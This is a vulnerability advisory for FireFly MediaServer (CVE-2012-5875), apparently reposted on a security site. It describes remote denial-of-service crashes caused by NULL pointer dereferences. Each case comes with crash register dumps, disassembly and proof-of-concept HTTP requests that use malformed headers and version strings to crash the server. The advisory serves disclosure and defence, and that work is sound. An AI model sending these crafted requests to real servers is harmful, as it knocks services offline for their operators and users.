Firefly MediaServer Multiple Remote DoS Vulnerabilities

2012-12-19 / 2012-12-20
Credit: High-Tech Bridge Security Research Lab
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2012-5875
CWE: CWE-476


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

Advisory ID: HTB23129 Product: FireFly Mediaserver Vendor: FireFly Vulnerable Version(s): 1.0.0.1359 and probably prior Tested Version: 1.0.0.1359 in Windows 7 SP1 Vendor Notification: November 21, 2012 Public Disclosure: December 19, 2012 Vulnerability Type: NULL Pointer Dereference [CWE-476] CVE Reference: CVE-2012-5875 CVSSv2 Base Score: 5 (AV:N/AC:L/Au:N/C:N/I:N/A:P) Risk Level: Medium Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab has discovered multiple remote denial of service (DoS) vulnerabilities in FireFly MediaServer, which could be exploited by a malicious person to crash a remote server. 1) Multiple NULL pointer dereference vulnerabilities in Firefly MediaServer: CVE-2012-5875 1.1 The vulnerability exists due to improper handling of the HTTP CONNECTION header within the "firefly.exe" binary file. A remote attacker can send a specially crafted packet to 9999/TCP port (FireFly's server default port) with improper CONNECTION header value, leading to a NULL pointer dereference that will cause vulnerable server to crash immediately. Crash Details: EIP: 0041e223 cmp byte [ecx],0x20 EAX: 0175eee8 ( 24506088) -> xxxxxxx_xxxx_ (stack) EBX: 00000000 ( 0) -> N/A ECX: 00000000 ( 0) -> N/A EDX: 0175eef0 ( 24506096) -> n 0n-us,en;q=0.5U) (stack) EDI: 0175eee8 ( 24506088) -> xxxxxxx_xxxx_ (stack) ESI: 0175eef5 ( 24506101) -> 0n-us,en;q=0.5U) (stack) EBP: 00708830 ( 7374896) -> p3xpPppHFF../../../../ (heap) ESP: 0175eed0 ( 24506064) -> u0p xxxxxxx_xxxx_n 0n-us,en;q=0.5U) (stack) +00: 00000000 ( 0) -> N/A +04: 00000001 ( 1) -> N/A +08: 0175ff80 ( 24510336) -> uw0</er<uuu\w () wu)|</er<uu|0|Aw<pv () vpx@ (stack) +0c: 00708830 ( 7374896) -> p3xpPppHFF../../../../ (heap) +10: 00000000 ( 0) -> N/A +14: 00000007 ( 7) -> N/A Disasm around: 0x0041e206 jnz 0x41e223 0x0041e208 mov edx,[ebp+0x4] 0x0041e20b push edi 0x0041e20c push edx 0x0041e20d push dword 0x4525e0 0x0041e212 push byte 0x2 0x0041e214 push byte 0x2 0x0041e216 call 0x40ea90 0x0041e21b add esp,0x14 0x0041e21e jmp 0x41e160 0x0041e223 cmp byte [ecx],0x20 0x0041e226 jnz 0x41e232 0x0041e228 inc ecx 0x0041e229 mov [esp+0x10],ecx 0x0041e22d cmp byte [ecx],0x20 0x0041e230 jz 0x41e228 0x0041e232 mov eax,ecx 0x0041e234 lea esi,[eax+0x1] 0x0041e237 mov dl,[eax] 0x0041e239 inc eax 0x0041e23a cmp dl,bl Proof of Concept: The following HTTP request will crash the vulnerable Firefly server remotely: GET / HTTP/1.1 Host: vulnhost.local User-Agent: Mozilla/5.0 (Windows; U) Accept-Language: en-us,en;q=0.5 Keep-Alive: 300 Connection: xxxxxxx_xxxx_ Referer: http://www.host.com 1.2 The vulnerability exists due to improper handling of the ACCEPT-LANGUAGE, USER-AGENT and HOST HTTP header parameters within the "firefly.exe" binary file. A remote attacker can send a specially crafted packet to port 9999/TCP with a malformed header containing a control character of return carriage ("\r\n") that will cause a NULL pointer dereference and immediate termination of the vulnerable server. The following examples demonstrate the vulnerabilities: a) ACCEPT-LANGUAGE Crash details: EIP: 0041e223 cmp byte [ecx],0x20 EAX: 0175eee8 ( 24506088) -> (stack) EBX: 00000000 ( 0) -> N/A ECX: 00000000 ( 0) -> N/A EDX: 0175eef0 ( 24506096) -> nguage /5.0 (Windows; U) (stack) EDI: 0175eee8 ( 24506088) -> (stack) ESI: 0175eefa ( 24506106) -> /5.0 (Windows; U) (stack) EBP: 00708830 ( 7374896) -> p3xxpppHFF (heap) ESP: 0175eed0 ( 24506064) -> u0pguage /5.0 (Windows; U) (stack) +00: 00000000 ( 0) -> N/A +04: 00000001 ( 1) -> N/A +08: 0175ff80 ( 24510336) -> uw0</er<uuu\w () wu)|</er<uu|0|Aw<pv () vp x (stack) +0c: 00708830 ( 7374896) -> p3xxpppHFF (heap) +10: 00000000 ( 0) -> N/A +14: 00000007 ( 7) -> N/A Disasm around: 0x0041e206 jnz 0x41e223 0x0041e208 mov edx,[ebp+0x4] 0x0041e20b push edi 0x0041e20c push edx 0x0041e20d push dword 0x4525e0 0x0041e212 push byte 0x2 0x0041e214 push byte 0x2 0x0041e216 call 0x40ea90 0x0041e21b add esp,0x14 0x0041e21e jmp 0x41e160 0x0041e223 cmp byte [ecx],0x20 0x0041e226 jnz 0x41e232 0x0041e228 inc ecx 0x0041e229 mov [esp+0x10],ecx 0x0041e22d cmp byte [ecx],0x20 0x0041e230 jz 0x41e228 0x0041e232 mov eax,ecx 0x0041e234 lea esi,[eax+0x1] 0x0041e237 mov dl,[eax] 0x0041e239 inc eax 0x0041e23a cmp dl,bl Proof of concept: The following HTTP request will crash the vulnerable Firefly server remotely: GET / HTTP/1.1 Host: somehost.com User-Agent: Mozilla/5.0 (Windows; U) Accept-Language: en-us en;q=0.5 \r\n Keep-Alive: 300 Connection: keep-alive Referer: http://www.host.com b) USER-AGENT Crash details EIP: 0041e223 cmp byte [ecx],0x20 EAX: 0175eee8 ( 24506088) -> xxxxxxx (stack) EBX: 00000000 ( 0) -> N/A ECX: 00000000 ( 0) -> N/A EDX: 0175eef0 ( 24506096) -> t t (stack) EDI: 0175eee8 ( 24506088) -> xxxxxxx(stack) ESI: 0175eef5 ( 24506101) -> t (stack) EBP: 007087d8 ( 7374808) -> p>ppPp<p (heap) ESP: 0175eed0 ( 24506064) -> upxxxxxxxt t (stack) +00: 00000000 ( 0) -> N/A +04: 00000001 ( 1) -> N/A +08: 0175ff80 ( 24510336) -> N/A +0c: 007087d8 ( 7374808) -> p>ppPp<p (heap) +10: 00000000 ( 0) -> N/A +14: 00000007 ( 7) -> N/A Disasm around: 0x0041e206 jnz 0x41e223 0x0041e208 mov edx,[ebp+0x4] 0x0041e20b push edi 0x0041e20c push edx 0x0041e20d push dword 0x4525e0 0x0041e212 push byte 0x2 0x0041e214 push byte 0x2 0x0041e216 call 0x40ea90 0x0041e21b add esp,0x14 0x0041e21e jmp 0x41e160 0x0041e223 cmp byte [ecx],0x20 0x0041e226 jnz 0x41e232 0x0041e228 inc ecx 0x0041e229 mov [esp+0x10],ecx 0x0041e22d cmp byte [ecx],0x20 0x0041e230 jz 0x41e228 0x0041e232 mov eax,ecx 0x0041e234 lea esi,[eax+0x1] 0x0041e237 mov dl,[eax] 0x0041e239 inc eax 0x0041e23a cmp dl,bl Proof of concept: The following HTTP request will crash the vulnerable Firefly server remotely: GET / HTTP/1.1 Host: somehost.com User-Agent: xxxxxxx \r\n Accept-Language: en-us,en;q=0.5 Keep-Alive: 300 Connection: keep-alive Referer: http://www.host.com c) HOST Crash Details: EIP: 0041e223 cmp byte [ecx],0x20 EAX: 0175eee8 ( 24506088) -> xxxxxxx (stack) EBX: 00000000 ( 0) -> N/A ECX: 00000000 ( 0) -> N/A EDX: 0175eef0 ( 24506096) -> (stack) EDI: 0175eee8 ( 24506088) -> xxxxxxx (stack) ESI: 0175eeef ( 24506095) -> (stack) EBP: 00708830 ( 7374896) -> p!ppp\pHFF"& (heap) ESP: 0175eed0 ( 24506064) -> u0pxxxxxxx (stack) +00: 00000000 ( 0) -> N/A +04: 00000001 ( 1) -> N/A +08: 0175ff80 ( 24510336) -> N/A +0c: 00708830 ( 7374896) -> p!ppp\pHFF"& (heap) +10: 00000000 ( 0) -> N/A +14: 00000007 ( 7) -> N/A Disasm around: 0x0041e206 jnz 0x41e223 0x0041e208 mov edx,[ebp+0x4] 0x0041e20b push edi 0x0041e20c push edx 0x0041e20d push dword 0x4525e0 0x0041e212 push byte 0x2 0x0041e214 push byte 0x2 0x0041e216 call 0x40ea90 0x0041e21b add esp,0x14 0x0041e21e jmp 0x41e160 0x0041e223 cmp byte [ecx],0x20 0x0041e226 jnz 0x41e232 0x0041e228 inc ecx 0x0041e229 mov [esp+0x10],ecx 0x0041e22d cmp byte [ecx],0x20 0x0041e230 jz 0x41e228 0x0041e232 mov eax,ecx 0x0041e234 lea esi,[eax+0x1] 0x0041e237 mov dl,[eax] 0x0041e239 inc eax 0x0041e23a cmp dl,bl Proof of concept: The following HTTP request will crash the vulnerable Firefly server remotely: GET / HTTP/1.1 Host: xxxxxxx\r\n User-Agent: Mozilla/5.0 (Windows; U) Accept-Language: en-us,en;q=0.5 Keep-Alive: 300 Connection: keep-alive Referer: http://www.host.com 1.3 The vulnerability exists due to improper handling of the HTTP POST and GET methods within the "firefly.exe" binary file. A remote attacker can send a specially crafted packet to 9999/TCP port with an improper HTTP POST or GET request containing an erroneous HTTP protocol version, or one or more control characters of return carriage ("\r\n") leading to a NULL pointer dereference that will cause the vulnerable server to crash immediately. The following examples demonstrate the vulnerabilities: a) HTTP POST Crash details: EIP: 0041e223 cmp byte [ecx],0x20 EAX: 0175eee8 ( 24506088) -> xxxxxxx (stack) EBX: 00000000 ( 0) -> N/A ECX: 00000000 ( 0) -> N/A EDX: 0175eef0 ( 24506096) -> (stack) EDI: 0175eee8 ( 24506088) -> xxxxxxx (stack) ESI: 00000001 ( 1) -> N/A EBP: 007087d8 ( 7374808) -> ppPpatp (heap) ESP: 0175eed0 ( 24506064) -> upxxxxxxx (stack) +00: 00000000 ( 0) -> N/A +04: 00000001 ( 1) -> N/A +08: 0175ff80 ( 24510336) -> N/A +0c: 007087d8 ( 7374808) -> ppPpatp (heap) +10: 00000000 ( 0) -> N/A +14: 00000007 ( 7) -> N/A Disasm around: 0x0041e206 jnz 0x41e223 0x0041e208 mov edx,[ebp+0x4] 0x0041e20b push edi 0x0041e20c push edx 0x0041e20d push dword 0x4525e0 0x0041e212 push byte 0x2 0x0041e214 push byte 0x2 0x0041e216 call 0x40ea90 0x0041e21b add esp,0x14 0x0041e21e jmp 0x41e160 0x0041e223 cmp byte [ecx],0x20 0x0041e226 jnz 0x41e232 0x0041e228 inc ecx 0x0041e229 mov [esp+0x10],ecx 0x0041e22d cmp byte [ecx],0x20 0x0041e230 jz 0x41e228 0x0041e232 mov eax,ecx 0x0041e234 lea esi,[eax+0x1] 0x0041e237 mov dl,[eax] 0x0041e239 inc eax 0x0041e23a cmp dl,b Proof of concept: The following HTTP request will crash the vulnerable Firefly server remotely: POST /index.html HTTP/ xxxxxxxx .1 b) HTTP GET Crash details: EIP: 0041e223 cmp byte [ecx],0x20 EAX: 0175eee8 ( 24506088) -> xxxxxxx (stack) EBX: 00000000 ( 0) -> N/A ECX: 00000000 ( 0) -> N/A EDX: 0175eef0 ( 24506096) -> (stack) EDI: 0175eee8 ( 24506088) -> xxxxxxx (stack) ESI: 00000001 ( 1) -> N/A EBP: 00708830 ( 7374896) -> p!pppHFF#) (heap) ESP: 0175eed0 ( 24506064) -> u0pxxxxxxx (stack) +00: 00000000 ( 0) -> N/A +04: 00000001 ( 1) -> N/A +08: 0175ff80 ( 24510336) -> N/A +0c: 00708830 ( 7374896) -> p!pppHFF#) (heap) +10: 00000000 ( 0) -> N/A +14: 00000007 ( 7) -> N/A Disasm around: 0x0041e206 jnz 0x41e223 0x0041e208 mov edx,[ebp+0x4] 0x0041e20b push edi 0x0041e20c push edx 0x0041e20d push dword 0x4525e0 0x0041e212 push byte 0x2 0x0041e214 push byte 0x2 0x0041e216 call 0x40ea90 0x0041e21b add esp,0x14 0x0041e21e jmp 0x41e160 0x0041e223 cmp byte [ecx],0x20 0x0041e226 jnz 0x41e232 0x0041e228 inc ecx 0x0041e229 mov [esp+0x10],ecx 0x0041e22d cmp byte [ecx],0x20 0x0041e230 jz 0x41e228 0x0041e232 mov eax,ecx 0x0041e234 lea esi,[eax+0x1] 0x0041e237 mov dl,[eax] 0x0041e239 inc eax 0x0041e23a cmp dl,bl Proof of concept #1: The following HTTP request will crash the vulnerable Firefly server remotely: GET /index.html HTTP/xxxxxxxx.1 Proof of concept #2: The following HTTP request will crash the vulnerable Firefly server remotely: GET /index.html HTTP/ xxxxxxxx.1 ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23129 - https://www.htbridge.com/advisory/HTB23129 - Firefly MediaServer Multiple Remote DoS vulnerabilities.

References:

https://www.htbridge.com/advisory/HTB23129


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top